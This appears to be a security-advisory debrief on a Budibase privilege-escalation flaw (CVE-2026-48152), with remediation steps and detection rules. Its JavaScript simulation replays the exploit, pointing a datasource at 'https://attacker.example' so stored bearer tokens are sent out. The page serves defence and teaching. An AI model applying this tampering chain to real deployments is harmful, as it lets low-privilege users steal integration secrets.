PatchSiren

PatchSiren cyber security CVE debrief

CVE-2026-48152 Budibase CVE debrief

A privilege escalation vulnerability in Budibase prior to version 3.39.0 allows users holding the Basic app role to exfiltrate the authorization secrets stored on REST datasources. The issue stems from insufficient access controls on the single-datasource GET and PUT endpoints, which are gated by the generic TABLE READ permission rather than by a Builder/Admin role check or a datasource-ownership check. Because the Basic role's WRITE permission set includes table read/write and query write, a Basic user can both read and rewrite datasource configurations. When a datasource is retrieved, its authentication secrets are redacted with placeholder values. An attacker can submit a PUT request that changes only the config.url field while leaving the redacted placeholders in place; the mergeConfigs() function treats those placeholders as "keep the stored value" and restores the original secrets into the saved record. On the next query execution, Budibase prepends the attacker-controlled base URL to the saved relative query path and applies the resolved authorization headers, so the secret is sent to an endpoint the attacker controls. The result is a server-side request forgery (SSRF) vector combined with secret disclosure. The vulnerability is classified as CWE-863 (Incorrect Authorization) and carries a CVSS 3.1 score of 8.1 (High severity).

Vendor
Budibase
Product
Unknown
CVSS
HIGH 8.1
CISA KEV
Not listed in stored evidence
Original CVE published
2026-05-27
Original CVE updated
2026-05-27
Advisory published
2026-05-27
Advisory updated
2026-05-27

Who should care

Organizations running Budibase instances where accounts holding the Basic app role belong to people who should not be able to read or change datasource configuration, which in practice means most multi-user deployments. Security teams managing low-code platforms with REST datasource integrations, since the secrets at risk are the credentials those integrations present to upstream APIs. Compliance officers responsible for secrets management and access-control auditing in citizen-developer environments.

Technical summary

The vulnerability exists in Budibase's datasource management endpoints: GET and PUT operations on a single datasource are protected only by the generic TABLE READ permission rather than by a role-specific or ownership-based check. The Basic app user role holds WRITE permissions covering table read/write and query write, so it satisfies that check. The exploit chain needs nothing beyond a Basic-role account on the app and a saved REST query that uses the targeted datasource. The user retrieves the REST datasource configuration and receives it with authentication secrets redacted to placeholder strings. The user then submits the same configuration back with only config.url changed, keeping the placeholders. The mergeConfigs() function, which was designed to let a legitimate editor save a record without re-entering secrets, restores the stored secrets wherever it sees a placeholder, and does so without regard to who sent the update or that the destination has changed. When a query on that datasource next executes, Budibase joins the attacker-controlled base URL with the query's saved relative path and attaches the restored authorization headers, so the secret leaves the server in an outbound request rather than in an API response the attacker could be denied. That is why the issue has server-side request forgery characteristics and why egress control is a meaningful compensating measure: the chain combines incorrect authorization (CWE-863) with attacker-directed outbound requests to achieve high-impact information disclosure.
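The following is an added model of the flaw described above, written for this debrief; it is not Budibase's code and does not reproduce the vendor's patch. The placeholder string, the Role values, the record shape and every function name are assumptions chosen to illustrate the mechanism. It replays the attack against a vulnerable PUT handler and then against a hardened one that requires a Builder/Admin role and refuses to restore placeholder secrets when config.url changes.

```javascript
// Added illustration of the vulnerability class, not Budibase's own code.
// REDACTED, Role, the record shape and all function names are assumptions.
const REDACTED = "--secret-value--";                    // assumed GET placeholder
const Role = { BASIC: "BASIC", BUILDER: "BUILDER", ADMIN: "ADMIN" };
const clone = (o) => JSON.parse(JSON.stringify(o));

// Constructed sample: a REST datasource as the server stores it.
const storedDatasource = {
  _id: "datasource_rest_example",
  config: {
    url: "https://api.internal.example",
    defaultHeaders: { Authorization: "Bearer real-secret-token" },
  },
};

// GET: secrets are replaced by the placeholder before the record leaves the server.
function redactForClient(ds) {
  const out = clone(ds);
  for (const k of Object.keys(out.config.defaultHeaders)) {
    out.config.defaultHeaders[k] = REDACTED;
  }
  return out;
}

// Vulnerable merge: a placeholder means "keep the stored secret", no matter who
// sent the update or which other fields (such as config.url) changed.
function mergeConfigsVulnerable(incoming, existing) {
  const merged = clone(incoming);
  for (const [k, v] of Object.entries(merged.config.defaultHeaders)) {
    if (v === REDACTED) merged.config.defaultHeaders[k] = existing.config.defaultHeaders[k];
  }
  return merged;
}

// Vulnerable PUT handler: only a generic table-write capability is checked,
// which the Basic role already holds.
function updateDatasourceVulnerable(user, incoming, existing) {
  if (!user.canWriteTables) throw new Error("forbidden");
  return mergeConfigsVulnerable(incoming, existing);
}

// Hardened PUT handler (assumed fix shape, not the vendor's patch): require a
// Builder/Admin role, and refuse to restore placeholder secrets when the base
// URL changes, so a redirected datasource cannot inherit the old credentials.
function updateDatasourceFixed(user, incoming, existing) {
  if (user.role !== Role.BUILDER && user.role !== Role.ADMIN) {
    throw new Error("forbidden: datasource edits require Builder or Admin");
  }
  const merged = clone(incoming);
  for (const [k, v] of Object.entries(merged.config.defaultHeaders)) {
    if (v !== REDACTED) continue;
    if (incoming.config.url !== existing.config.url) {
      throw new Error("re-enter secrets when config.url changes");
    }
    merged.config.defaultHeaders[k] = existing.config.defaultHeaders[k];
  }
  return merged;
}

// Query execution: datasource base URL plus the query's relative path, with the
// datasource's (restored) headers attached.
function buildRequest(ds, query) {
  return {
    url: new URL(query.path, ds.config.url).toString(),
    headers: { ...ds.config.defaultHeaders },
  };
}

// Replays the attack: a Basic user GETs the redacted record, changes only
// config.url, PUTs it back, then a saved query runs against it. Returns the
// outbound request the server would send, or { blocked } if the handler refused.
function simulateExploit(updateHandler) {
  const basicUser = { role: Role.BASIC, canWriteTables: true };
  const tampered = redactForClient(storedDatasource);
  tampered.config.url = "https://attacker.example";
  try {
    const saved = updateHandler(basicUser, tampered, storedDatasource);
    return buildRequest(saved, { path: "/v1/users" });
  } catch (err) {
    return { blocked: err.message };
  }
}

console.log(simulateExploit(updateDatasourceVulnerable));
console.log(simulateExploit(updateDatasourceFixed));
```

Against the vulnerable handler the simulated server sends the real bearer token to https://attacker.example/v1/users; against the hardened handler the Basic user is refused at the role check, and a Builder who changes the URL is made to re-enter the secret rather than silently carrying it over. The second rule is defense in depth on top of the authorization fix, not a substitute for it.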

Defensive priority

HIGH

Recommended defensive actions

  • Upgrade Budibase to version 3.39.0 or later; this is the only remediation for the authorization flaw itself
  • Rotate the authorization secrets of every REST datasource that a Basic-role user could have reached before the upgrade, since upgrading does not invalidate secrets that were already exfiltrated
  • Review and restrict Basic role assignments, particularly for accounts belonging to people outside the builder team
  • Audit REST datasource configurations: compare each config.url against the expected API host and treat any datasource whose base URL points elsewhere as evidence of tampering
  • Implement network egress controls so the Budibase server can only reach the API hosts its datasources are supposed to call; the secret leaves in a server-side outbound request, so blocking that request blocks the disclosure
  • Monitor application and audit logs for datasource configuration changes made by non-Builder accounts, for base URL changes, and for queries resolving to unexpected destinations
  • After upgrading, confirm with a Basic-role test account that the single-datasource GET and PUT endpoints now refuse the request instead of honoring the generic TABLE READ permission
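The audit and monitoring actions above amount to a small set of rules over datasource-change and query-execution records. The following is an added example of those rules, written for this debrief and not Budibase's own tooling. The event records are constructed, and the field names (actorRole, before, after, resolvedUrl) and the expected-host allowlist are assumptions; map them onto whatever your audit log or datasource export actually provides.

```javascript
// Added detection example, not Budibase's own tooling. Event shape, the
// placeholder string and EXPECTED_HOSTS are assumptions; records are constructed.
const REDACTED = "--secret-value--";                       // assumed redaction placeholder
const PRIVILEGED = new Set(["BUILDER", "ADMIN"]);
const EXPECTED_HOSTS = new Set(["api.internal.example", "hr.internal.example"]);

// Constructed sample events: one benign edit, one attacker edit, the query that
// follows it, and one benign credential rotation.
const sampleEvents = [
  { id: 1, action: "datasource.update", datasourceId: "ds_crm", actor: "alice", actorRole: "BUILDER",
    before: { url: "https://api.internal.example" },
    after:  { url: "https://api.internal.example/v2", defaultHeaders: { Authorization: REDACTED } } },
  { id: 2, action: "datasource.update", datasourceId: "ds_crm", actor: "mallory", actorRole: "BASIC",
    before: { url: "https://api.internal.example" },
    after:  { url: "https://attacker.example", defaultHeaders: { Authorization: REDACTED } } },
  { id: 3, action: "query.execute", datasourceId: "ds_crm", actor: "mallory", actorRole: "BASIC",
    resolvedUrl: "https://attacker.example/v1/users" },
  { id: 4, action: "datasource.update", datasourceId: "ds_hr", actor: "bob", actorRole: "ADMIN",
    before: { url: "https://hr.internal.example" },
    after:  { url: "https://hr.internal.example", defaultHeaders: { "X-Api-Key": "new-key" } } },
];

function hostOf(url) {
  try { return new URL(url).host; } catch { return null; }
}

// Returns one finding per suspicious event, with every rule that fired.
function findSuspiciousEvents(events) {
  const out = [];
  for (const ev of events) {
    const reasons = [];
    if (ev.action === "datasource.update") {
      // Rule 1: datasource edits should only come from Builder/Admin accounts.
      if (!PRIVILEGED.has(ev.actorRole)) reasons.push("datasource edit by non-Builder/Admin account");
      // Rule 2: the exploit signature is a base URL host change with every
      // auth header still at the placeholder value (secrets carried over).
      const hostChanged = hostOf(ev.before.url) !== hostOf(ev.after.url);
      const headers = Object.values(ev.after.defaultHeaders || {});
      const secretsPreserved = headers.length > 0 && headers.every((v) => v === REDACTED);
      if (hostChanged && secretsPreserved) reasons.push("base URL host changed while secrets were left as placeholders");
      // Rule 3: base URL must stay within the known API hosts.
      if (!EXPECTED_HOSTS.has(hostOf(ev.after.url))) reasons.push("base URL outside expected hosts");
    } else if (ev.action === "query.execute") {
      // Rule 4: the resolved request destination must also stay within known hosts.
      if (!EXPECTED_HOSTS.has(hostOf(ev.resolvedUrl))) reasons.push("query resolved to unexpected host");
    }
    if (reasons.length > 0) {
      out.push({ id: ev.id, datasourceId: ev.datasourceId, actor: ev.actor, reasons });
    }
  }
  return out;
}

console.log(JSON.stringify(findSuspiciousEvents(sampleEvents), null, 2));
```

On the constructed sample, the Builder's path-only change and the Admin's key rotation produce no findings, the Basic user's update trips all three update rules, and the subsequent query trips the destination rule. Rule 2 is the most specific to this CVE; rules 3 and 4 also catch a compromised Builder account, which the upgrade alone does not address.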

Evidence notes

Vulnerability description sourced from official CVE record and NVD entry. Technical details regarding mergeConfigs() behavior, permission mappings, and exploitation flow derived from CVE description. Fix version 3.39.0 confirmed in advisory. CVSS vector and score from NVD source data.

Official resources

2026-05-27